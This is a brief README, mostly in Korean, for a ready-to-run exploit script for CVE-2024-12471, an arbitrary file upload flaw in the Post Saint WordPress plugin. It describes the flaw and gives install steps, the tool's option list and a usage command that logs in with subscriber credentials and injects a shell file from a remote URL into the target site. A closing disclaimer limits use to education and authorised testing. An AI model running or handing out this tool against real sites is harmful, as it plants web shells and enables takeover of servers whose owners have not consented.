
Post Saint <= 1.3.1 WordPress 플러그인 임의 파일 업로드
Post Saint <= 1.3.1 WordPress 플러그인 임의 파일 업로드
Post Saint WordPress 플러그인(1.3.1 이하 버전)은 누락된 권한 확인 및 파일 형식 검증으로 인해 임의 파일 업로드에 취약합니다. 최소 구독자 수준의 접근 권한을 가진 인증된 공격자는 이 취약점을 악용하여 임의 파일을 업로드할 수 있으며, 잠재적으로 원격 코드 실행으로 이어질 수 있습니다.
pip install requests packaging urllib3
CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-ru REMOTE_URL, --remote_url REMOTE_URL
Remote URL of the shell file to inject
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>
이 스크립트는 교육 및 연구 목적으로만 제공됩니다. 소유하지 않았거나 테스트를 위한 명시적 허가를 받지 않은 시스템에 대한 무단 사용은 불법이며 비윤리적입니다.